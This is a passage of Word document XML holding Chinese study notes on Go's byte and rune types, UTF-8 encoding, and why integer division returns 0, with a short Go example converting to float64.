      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://c.biancheng.net/view/18.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775DB9C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61AD3400" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rune</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的别名类型，一个值就代表一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB0D810" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uint8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的别名类型，一个值就是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>码值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375DC584" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rune</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型的值在底层都是由一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> UTF-8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码值来表达的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236F1B6B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="787B8FC4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符，我们平时接触到的中英日文，或者复合字符，都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37473F60" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UTF-8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码方案会把一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unicode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符编码为一个长度在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1~4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以内的字节序列。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43571260" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以，一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rune</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型值代表了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1~4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个长度的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E68D82B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1739EE06" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串中的每一个元素叫做“字符”，在遍历或者单个获取字符串元素时可以获得字符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246D0E29" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06C4F44B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言的字符有以下两种：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDC99F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一种是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">uint8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或者叫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> byte </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>型，代表了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ASCII </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>码的一个字符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460B85D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一种是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">rune </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，代表一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> UTF-8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符，当需要处理中文、日文或者其他复合字符时，则需要用到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> rune </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">rune </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型等价于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> int32 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4319DB79" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52059968" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">byte </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> uint8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的别名，对于只占用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节的传统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ASCII </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码的字符来说，完全没有问题，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> var ch byte = 'A'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，字符使用单引号括起来。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDB0C90" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D7DCBB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>byte == uint8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFD6920" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rune == int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节，可以用来表示宽字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB6C033" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26F83A9F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ASCII </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>码表中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 65</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制表示则为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 41</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以下面的写法是等效的：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEDB44A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">var ch byte = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>65</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> var ch byte = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>'\x41'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">\x </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总是紧跟着长度为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制数）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092A3C26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3452394C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="516CFAFD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CE5A8B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="289" w:name="_Toc159779749"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除运算时只得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:bookmarkEnd w:id="289"/>
    </w:p>
    <w:p w14:paraId="7185F7B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里不论怎么写，返回都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7C86F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="6A8E7646" wp14:editId="765C3AE3">
            <wp:extent cx="3906520" cy="1943735"/>
            <wp:effectExtent l="0" t="0" r="10160" b="698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94"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3906520" cy="1943735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33526BCD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BFE688B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a&gt;b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的情况下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a/b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到的结果是商，没有小数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FD8ADD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EC52F8E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若只想得到商，也就是不要余数整除的结果，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>20/6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>想得到结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么可以写成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%.0f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来只得到整数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBE2A50" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7369FCBA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a&gt;b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a&lt;b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，只有先转换为浮点数后再进行除操作才是带小数最准确的结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44115837" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68721E81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eg:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D09239C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A81553" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>var a int = 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65470284" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>var b int = 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70387B56" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">fmt.Println(a / b)  // </w:t>
      </w:r>
      <w:r>
        <w:t>结果为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，不符合预期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E075F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">num0, _ := strconv.ParseFloat(fmt.Sprintf("%.2f", a/b), 64)                   // </w:t>
      </w:r>
      <w:r>
        <w:t>保留</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>位小数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1AA24E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">fmt.Println(num0)   // </w:t>
      </w:r>
      <w:r>
        <w:t>结果为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，不符合预期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D163CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">num1, _ := strconv.ParseFloat(fmt.Sprintf("%.2f", float64(a)/float64(b)), 64) // </w:t>
      </w:r>
